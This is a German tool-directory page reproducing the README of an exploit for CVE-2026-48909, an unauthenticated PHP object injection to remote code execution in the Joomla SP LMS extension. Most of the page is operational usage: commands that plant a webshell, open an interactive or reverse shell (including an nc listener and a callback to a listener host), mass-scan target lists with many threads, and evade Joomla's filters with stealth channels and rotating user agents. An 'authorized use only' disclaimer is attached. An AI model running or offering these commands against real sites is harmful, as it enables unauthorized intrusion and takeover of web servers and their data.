Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Nicht authentifizierte PHP-Objektinjektion zu RCE-Exploit für Joomla SP LMS-Erweiterung Versionen <= 4.1.3. Nutzt die Deserialisierung des lmsOrders-Cookies aus, um über die Joomla FormattedtextLogger-Gadget-Kette eine Webshell zu schreiben. Enthält interaktive Shell, Pfadfindung und Bereinigung. Nur für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
SchwachstellenanalyseCode-AnalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
Payload-Entwicklung
Labs & Praxis
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Repository anzeigen
215vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-48909 - Nicht authentifizierte PHP-Objektinjektion zu RCE-Exploit für Joomla SP LMS-Erweiterung Versionen <= 4.1.3. Nutzt die Deserialisierung des lmsOrders-Cookies aus, um über die Joomla FormattedtextLogger-Gadget-Kette eine Webshell zu schreiben. Enthält interaktive Shell, Pfadfindung und Bereinigung. Nur für autorisierte Sicherheitstests.

Teilen

CVE-2026-48909

Joomla SP LMS — Nicht authentifizierte PHP-Objekt-Injektion → RCE

Python Version CVSS License Platform

Proof-of-Concept-Bewertungstool für CVE-2026-48909
Autor: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Nur für autorisierte Nutzung. Dieses Tool dient der Sicherheitsforschung, Bildung und dem Testen von Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zur Bewertung haben. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Funktionen
  • Installation
  • Schnellstart
  • Benutzerhandbuch
  • Befehlsreferenz
  • Payload-Typen
  • Angriffskette
  • Ausgabebeispiele
  • Fehlerbehebung
  • Repository-Struktur
  • Versionsverlauf
  • Haftungsausschluss
  • Autor

Übersicht

CVE-2026-48909 ist eine kritische nicht authentifizierte PHP-Objekt-Injektion in der Joomla SP LMS-Erweiterung. Dieses Tool implementiert die vollständige Angriffskette, damit Sicherheitsexperten die Auswirkungen in Labor- oder autorisierten Umgebungen validieren können.

Es umfasst Erkennung, Pfadfindung, Payload-Zustellung, interaktive Post-Exploitation (wo erlaubt), Massenbewertung und optionale Bereinigung.


Schwachstellendetails

AttributWert
CVE-IDCVE-2026-48909
CVSS9.5 (Kritisch)
AngriffsvektorNetzwerk – nicht authentifiziert
AuswirkungRemote-Code-Ausführung
Betroffenes ProduktJoomla SP LMS
Betroffene Versionen1.0.0 – 4.1.3
Gepatchte VersionSP LMS 4.1.4+
Gadget-KetteErfordert Joomla < 5.2.2

Kompatibilitätsmatrix

KomponenteVersionRCE
SP LMS< 4.1.4Anfällig
SP LMS≥ 4.1.4Gepatcht
Joomla< 5.2.2Gadget-Kette nutzbar
Joomla≥ 5.2.2Gadget-Kette gepatcht

Funktionen

Kern

FähigkeitBeschreibung
Nicht authentifizierter ExploitKeine Anmeldeinformationen erforderlich
Mehrere Payloads7 Webshell-/Ausführungsvarianten
Interaktive ShellSitzung mit Befehlsverlauf nach Bereitstellung
PfadfindungAutomatische Suche nach beschreibbaren Pfaden
BereinigungEntfernen der bereitgestellten Webshell nach Tests

Bewertung & Betrieb

FähigkeitBeschreibung
MassenscanMultithreaded Ziellisten (1000+)
Proxy-UnterstützungHTTP/SOCKS (Burp, ZAP, etc.)
Reverse ShellListener-basierte Payloads
Stealth-ModusHeader-/POST-orientierte Befehlskanäle
RandomisierungUUID-Shell-Namen, User-Agent-Rotation
BerichterstattungExport als JSON, HTML oder CSV
ErkennungshilfenJoomla-Versionsprüfungen, --check-only, --safe-mode

Hinweise zur Umgehung

  • Vermeidet nach Möglichkeit Zeichen, die von Joomlas cmd-Filter blockiert werden
  • Hex-codierter PHP-Schreibpfad, um Base64-Padding-/Schrägstrich-Probleme zu reduzieren
  • Konfigurierbare Verzögerungen und rotierende User-Agents
  • Wiederholungslogik über mehrere Injektions-/Pfadkandidaten

Installation

Voraussetzungen

  • Python 3.6+
  • pip
  • Netzwerkerreichbarkeit zu den zu testenden Ziel(en)

Einrichtung

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Abhängigkeiten

requests>=2.31.0
urllib3>=2.0.0

argparse ist Teil der Python-Standardbibliothek; es muss nicht über pip installiert werden.


Schnellstart

Ersetzen Sie https://target.example nur durch ein Labor- oder autorisiertes Ziel.

Einzelnes Ziel – Pfad finden + interaktive Shell

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Sichere Überprüfungen (keine Ausnutzung)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Massenscan

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Reverse Shell (autorisiertes Labor)

# Listener
nc -lvnp 4444

# Exploit-Host
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Benutzerhandbuch

Pfadfindung

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Bekannter beschreibbarer Pfad

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Interaktive Sitzung

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Einmal-Befehl

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Stealth-Payload + interaktiv

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Bereinigung

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Ziellistenformat

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Befehlsreferenz

Ziel

ArgumentBeschreibung
targetEinzelne Ziel-URL
--targets, -T DATEIDatei mit Zielen (eine URL pro Zeile)
--path PFADAbsoluter Serverpfad für Webshell
--shell-type TYPminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEWebshell-Dateiname (Standard: x.php)

Netzwerk

ArgumentBeschreibung
--timeout SEKUNDENRequest-Timeout (Standard: 15)
--insecureTLS-Zertifikatsprüfung überspringen
--proxy URLz.B. http://127.0.0.1:8080
--random-uaUser-Agent rotieren (standardmäßig aktiviert)
--delay SEKUNDENVerzögerung zwischen Requests

Reverse Shell

ArgumentBeschreibung
--reverse-host HOSTListener-Host
--reverse-port PORTListener-Port

Modi

ArgumentBeschreibung
--interactive, -iInteraktive Shell nach Bereitstellung
--check-onlyNur Schwachstellenprüfung
--safe-modeNicht-destruktives Testen
--find-pathBeschreibbaren Pfad automatisch erkennen
--cmd BEFEHLEinen Befehl ausführen und beenden
--cleanup PFADWebshell unter Pfad entfernen
--cleanup-afterBereinigung nach Exploitation

Massenscan / Bericht

Tool herunterladen